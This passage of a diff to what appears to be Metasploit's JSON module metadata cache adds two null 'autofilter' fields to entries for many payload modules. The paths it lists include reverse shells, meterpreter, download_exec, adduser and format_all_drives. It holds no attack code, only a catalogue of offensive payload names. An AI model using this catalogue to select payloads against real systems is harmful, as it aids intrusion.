"targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", @@ -105605,6 +134305,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", @@ -105634,6 +134336,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb", @@ -105663,6 +134367,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb", @@ -105693,6 +134399,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/bind_perl.rb", @@ -105723,6 +134431,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/bind_perl_ipv6.rb", @@ -105753,6 +134463,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/bind_php.rb", @@ -105783,6 +134495,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/bind_php_ipv6.rb", @@ -105812,6 +134526,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/download_exec.rb", @@ -105841,6 +134557,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/exec.rb", @@ -105870,6 +134588,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/bind_tcp.rb", @@ -105899,6 +134619,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/bind_tcp_ipv6.rb", @@ -105929,6 +134651,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb", @@ -105959,6 +134683,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/bind_tcp_uuid.rb", @@ -105988,6 +134714,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/reverse_tcp.rb", @@ -106018,6 +134746,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/reverse_tcp_uuid.rb", @@ -106047,6 +134777,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-07 18:48:10 +0000", "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb", @@ -106076,6 +134808,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/reverse_perl.rb", @@ -106105,6 +134839,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/reverse_php.rb", @@ -106134,6 +134870,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/shell_findsock.rb", @@ -106163,6 +134901,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/bind_tcp.rb", @@ -106193,6 +134933,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb", @@ -106222,6 +134964,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/reverse_http.rb", @@ -106251,6 +134995,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/reverse_https.rb", @@ -106280,6 +135026,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/reverse_tcp.rb", @@ -106311,6 +135059,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb", @@ -106341,6 +135091,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb", @@ -106370,6 +135122,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-27 14:18:54 +0000", "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb", @@ -106399,6 +135153,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-27 14:18:54 +0000", "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb", @@ -106428,6 +135184,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-27 14:18:54 +0000", "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb", @@ -106457,6 +135215,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-27 14:18:54 +0000", "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb", @@ -106486,6 +135246,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-10-23 23:04:02 +0000", "path": "/modules/payloads/singles/python/shell_bind_tcp.rb", @@ -106515,6 +135277,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/python/shell_reverse_tcp.rb", @@ -106544,6 +135308,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb", @@ -106573,6 +135339,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 13:33:36 +0000", "path": "/modules/payloads/singles/python/shell_reverse_udp.rb", @@ -106602,6 +135370,8 @@ "platform": "R", "arch": "r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-28 05:30:30 +0000", "path": "/modules/payloads/singles/r/shell_bind_tcp.rb", @@ -106631,6 +135401,8 @@ "platform": "R", "arch": "r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-28 05:30:30 +0000", "path": "/modules/payloads/singles/r/shell_reverse_tcp.rb", @@ -106661,6 +135433,8 @@ "platform": "Ruby", "arch": "ruby", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/ruby/shell_bind_tcp.rb", @@ -106691,6 +135465,8 @@ "platform": "Ruby", "arch": "ruby", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb", @@ -106721,6 +135497,8 @@ "platform": "Ruby", "arch": "ruby", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/ruby/shell_reverse_tcp.rb", @@ -106750,6 +135528,8 @@ "platform": "Ruby", "arch": "ruby", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb", @@ -106779,6 +135559,8 @@ "platform": "Solaris", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb", @@ -106808,6 +135590,8 @@ "platform": "Solaris", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/solaris/sparc/shell_find_port.rb", @@ -106837,6 +135621,8 @@ "platform": "Solaris", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb", @@ -106866,6 +135652,8 @@ "platform": "Solaris", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb", @@ -106895,6 +135683,8 @@ "platform": "Solaris", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/solaris/x86/shell_find_port.rb", @@ -106924,6 +135714,8 @@ "platform": "Solaris", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb", @@ -106953,6 +135745,8 @@ "platform": "Unix", "arch": "tty", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/tty/unix/interact.rb", @@ -106985,6 +135779,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/adduser.rb", @@ -107018,6 +135814,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -107051,6 +135849,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -107083,6 +135883,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -107116,6 +135918,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -107147,6 +135951,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -107178,6 +135984,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -107210,6 +136018,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -107244,6 +136054,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -107276,6 +136088,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -107307,6 +136121,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -107340,6 +136156,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb", @@ -107371,6 +136189,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_http.rb", @@ -107402,6 +136222,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", @@ -107434,6 +136256,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -107465,6 +136289,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -107496,6 +136322,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -107528,6 +136356,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -107560,6 +136390,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -107593,6 +136425,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -107627,6 +136461,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -107661,6 +136497,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -107693,6 +136531,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -107724,6 +136564,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -107756,6 +136598,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", @@ -107785,6 +136629,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/dns_txt_query_exec.rb", @@ -107814,6 +136660,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/download_exec.rb", @@ -107844,6 +136692,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/exec.rb", @@ -107875,6 +136725,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/format_all_drives.rb", @@ -107905,6 +136757,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/loadlibrary.rb", @@ -107935,6 +136789,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/messagebox.rb", @@ -107969,6 +136825,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -108003,6 +136861,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -108036,6 +136896,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -108069,6 +136931,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -108102,6 +136966,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -108135,6 +137001,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -108168,6 +137036,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -108203,6 +137073,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -108236,6 +137108,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -108268,6 +137142,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -108303,6 +137179,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb", @@ -108336,6 +137214,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_http.rb", @@ -108369,6 +137249,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", @@ -108402,6 +137284,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_https.rb", @@ -108437,6 +137321,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_https_proxy.rb", @@ -108470,6 +137356,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -108502,6 +137390,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-01 03:49:00 +0000", "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", @@ -108535,6 +137425,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -108568,6 +137460,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -108601,6 +137495,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -108634,6 +137530,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -108668,6 +137566,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -108703,6 +137603,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -108738,6 +137640,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -108771,6 +137675,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -108804,6 +137710,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -108838,6 +137746,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", @@ -108872,6 +137782,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb", @@ -108904,6 +137816,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-11 18:56:50 +0000", "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb", @@ -108935,6 +137849,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb", @@ -108966,6 +137882,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb", @@ -108997,6 +137915,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb", @@ -109028,6 +137948,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb", @@ -109059,6 +137981,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb", @@ -109088,6 +138012,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/metsvc_bind_tcp.rb", @@ -109117,6 +138043,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/metsvc_reverse_tcp.rb", @@ -109150,6 +138078,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -109183,6 +138113,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -109215,6 +138147,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -109248,6 +138182,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -109279,6 +138215,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 